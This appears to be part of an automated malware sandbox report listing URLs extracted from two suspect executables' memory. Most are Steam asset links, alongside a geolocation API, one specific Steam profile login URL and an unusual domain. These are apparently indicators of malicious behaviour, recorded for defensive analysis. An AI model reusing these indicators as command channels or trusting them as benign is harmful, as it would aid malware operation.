Source: SUwX12D2S6.exe, 00000018.00000002.2117893429.00000000006B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json
Source: SUwX12D2S6.exe, 0000000C.00000002.1864655252.0000000000788000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json$
Source: SUwX12D2S6.exe, 00000006.00000002.4130188988.0000000000728000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json;
Source: SUwX12D2S6.exe, 0000000C.00000002.1864753840.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 0000000C.00000003.1863989873.00000000007D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonE
Source: SUwX12D2S6.exe, 00000006.00000002.4130188988.0000000000767000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonN9
Source: SUwX12D2S6.exe, 00000018.00000002.2117893429.0000000000714000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsondn
Source: SUwX12D2S6.exe, 00000018.00000002.2117893429.00000000006B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsons
Source: SUwX12D2S6.exe, 00000018.00000002.2117893429.00000000006B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsont
Source: SUwX12D2S6.exe, 0000000C.00000002.1864655252.0000000000788000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000018.00000002.2117893429.00000000006B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonz
Source: SUwX12D2S6.exe, 00000001.00000002.1695073196.0000000000808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonzW
Source: build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: SUwX12D2S6.exe, 00000004.00000003.1783890640.00000000097F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://assets.activity.windows.com
Source: SUwX12D2S6.exe, 00000004.00000003.1783890640.00000000097F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://assets.activity.windows.com/v1/assets
Source: SUwX12D2S6.exe, 00000004.00000003.1783890640.00000000097F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
Source: build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/
Source: build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6jg&a
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=c4UneKQJ
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=2YYI
Source: build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=ZVlkBFZXqRp1&l=e
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: SUwX12D2S6.exe, 00000004.00000003.1792498139.00000000097F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api
Source: build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptch
Source: build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1805735818.000000000092F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: build2.exe, 00000008.00000002.1967987129.00000000008B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/d
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199673019888
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: build2.exe, 00000008.00000003.1852670646.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1852670646.0000000000921000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1888221528.0000000000950000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1966489860.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1870400492.0000000000928000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
